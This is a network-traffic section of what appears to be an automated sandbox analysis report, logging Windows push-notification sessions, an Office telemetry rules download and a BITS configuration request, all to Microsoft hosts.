                      2024-12-03 16:51:13 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 64 71 34 39 6e 7a 41 47 76 6b 53 53 63 4c 42 77 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 36 65 33 39 37 38 63 34 61 62 39 38 63 61 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 42 33 33 77 58 39 56 4c 44 37 43 76 62 50 53 6d 79 55 30 61 6f 64 4e 4e 46 38 4f 56 49 48 66 2f 43 6c 36 5a 43 41 71 66 65 4c 32 58 35 33 68 63 64 44 62 4e 6c 69 48 64 65 59 45 64 33 64 4e 58 69 79 43 44 77 4b 39 39 35 47 6a 52 55 57 4f 53 74 30 75 6e 6d 51 33 72 50 43 72 44 55 58 6a 4c 4a 56 56 50 56 32 48 70 42 56 63 32
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: dq49nzAGvkSScLBw.2Context: c6e3978c4ab98ca6<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARB33wX9VLD7CvbPSmyU0aodNNF8OVIHf/Cl6ZCAqfeL2X53hcdDbNliHdeYEd3dNXiyCDwK995GjRUWOSt0unmQ3rPCrDUXjLJVVPV2HpBVc2
                      2024-12-03 16:51:13 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 64 71 34 39 6e 7a 41 47 76 6b 53 53 63 4c 42 77 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 36 65 33 39 37 38 63 34 61 62 39 38 63 61 36 0d 0a 0d 0a
                      Data Ascii: BND 3 CON\QOS 56MS-CV: dq49nzAGvkSScLBw.3Context: c6e3978c4ab98ca6
                      2024-12-03 16:51:13 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2024-12-03 16:51:13 UTC58INData Raw: 4d 53 2d 43 56 3a 20 57 76 2f 51 59 37 41 4e 4c 55 57 61 53 44 6d 65 5a 6b 6f 4b 6e 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: Wv/QY7ANLUWaSDmeZkoKnA.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      2192.168.2.64971620.198.119.143443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:23 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4e 43 65 54 67 72 4b 5a 48 45 36 67 64 2f 59 74 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 36 35 36 66 38 36 32 64 31 33 38 64 65 37 31 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: NCeTgrKZHE6gd/Yt.1Context: b656f862d138de71
                      2024-12-03 16:51:23 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2024-12-03 16:51:23 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4e 43 65 54 67 72 4b 5a 48 45 36 67 64 2f 59 74 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 36 35 36 66 38 36 32 64 31 33 38 64 65 37 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 42 33 33 77 58 39 56 4c 44 37 43 76 62 50 53 6d 79 55 30 61 6f 64 4e 4e 46 38 4f 56 49 48 66 2f 43 6c 36 5a 43 41 71 66 65 4c 32 58 35 33 68 63 64 44 62 4e 6c 69 48 64 65 59 45 64 33 64 4e 58 69 79 43 44 77 4b 39 39 35 47 6a 52 55 57 4f 53 74 30 75 6e 6d 51 33 72 50 43 72 44 55 58 6a 4c 4a 56 56 50 56 32 48 70 42 56 63 32
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: NCeTgrKZHE6gd/Yt.2Context: b656f862d138de71<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARB33wX9VLD7CvbPSmyU0aodNNF8OVIHf/Cl6ZCAqfeL2X53hcdDbNliHdeYEd3dNXiyCDwK995GjRUWOSt0unmQ3rPCrDUXjLJVVPV2HpBVc2
                      2024-12-03 16:51:23 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4e 43 65 54 67 72 4b 5a 48 45 36 67 64 2f 59 74 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 36 35 36 66 38 36 32 64 31 33 38 64 65 37 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: NCeTgrKZHE6gd/Yt.3Context: b656f862d138de71<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2024-12-03 16:51:24 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2024-12-03 16:51:24 UTC58INData Raw: 4d 53 2d 43 56 3a 20 78 5a 66 69 4e 72 78 65 76 30 6d 4f 75 2b 4a 5a 57 58 42 51 31 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: xZfiNrxev0mOu+JZWXBQ1g.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      3192.168.2.64971720.198.119.143443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:24 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 74 63 6c 6f 46 52 54 68 4a 30 57 79 6d 38 53 49 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 30 37 63 36 62 39 30 65 37 39 36 62 62 30 63 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: tcloFRThJ0Wym8SI.1Context: 707c6b90e796bb0c
                      2024-12-03 16:51:24 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2024-12-03 16:51:24 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 74 63 6c 6f 46 52 54 68 4a 30 57 79 6d 38 53 49 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 30 37 63 36 62 39 30 65 37 39 36 62 62 30 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 42 33 33 77 58 39 56 4c 44 37 43 76 62 50 53 6d 79 55 30 61 6f 64 4e 4e 46 38 4f 56 49 48 66 2f 43 6c 36 5a 43 41 71 66 65 4c 32 58 35 33 68 63 64 44 62 4e 6c 69 48 64 65 59 45 64 33 64 4e 58 69 79 43 44 77 4b 39 39 35 47 6a 52 55 57 4f 53 74 30 75 6e 6d 51 33 72 50 43 72 44 55 58 6a 4c 4a 56 56 50 56 32 48 70 42 56 63 32
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: tcloFRThJ0Wym8SI.2Context: 707c6b90e796bb0c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARB33wX9VLD7CvbPSmyU0aodNNF8OVIHf/Cl6ZCAqfeL2X53hcdDbNliHdeYEd3dNXiyCDwK995GjRUWOSt0unmQ3rPCrDUXjLJVVPV2HpBVc2
                      2024-12-03 16:51:24 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 74 63 6c 6f 46 52 54 68 4a 30 57 79 6d 38 53 49 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 30 37 63 36 62 39 30 65 37 39 36 62 62 30 63 0d 0a 0d 0a
                      Data Ascii: BND 3 CON\QOS 56MS-CV: tcloFRThJ0Wym8SI.3Context: 707c6b90e796bb0c
                      2024-12-03 16:51:24 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2024-12-03 16:51:24 UTC58INData Raw: 4d 53 2d 43 56 3a 20 42 56 51 48 6d 54 56 56 56 6b 4b 55 61 2f 4d 35 79 44 79 4e 55 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: BVQHmTVVVkKUa/M5yDyNUg.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      4192.168.2.64972013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:27 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:27 UTC471INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:27 GMT
                      Content-Type: text/plain
                      Content-Length: 218853
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public
                      Last-Modified: Mon, 02 Dec 2024 13:20:33 GMT
                      ETag: "0x8DD12D41A424BC1"
                      x-ms-request-id: 300ecd5c-a01e-0050-4036-45db6e000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165127Z-174f7845968vqt9xhC1EWRgten000000165000000000t08s
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:27 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                      2024-12-03 16:51:27 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                      Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                      2024-12-03 16:51:28 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                      Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                      2024-12-03 16:51:28 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                      Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                      2024-12-03 16:51:28 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                      Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                      2024-12-03 16:51:28 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                      Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                      2024-12-03 16:51:28 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                      Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                      2024-12-03 16:51:28 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                      Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                      2024-12-03 16:51:28 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                      Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                      2024-12-03 16:51:28 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                      Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.64972123.218.208.109443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:27 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-12-03 16:51:27 UTC479INHTTP/1.1 200 OK
                      Content-Type: application/octet-stream
                      Server: Kestrel
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      X-Ms-ApiVersion: Distribute 1.2
                      X-Ms-Region: prod-weu-z1
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      X-OSID: 2
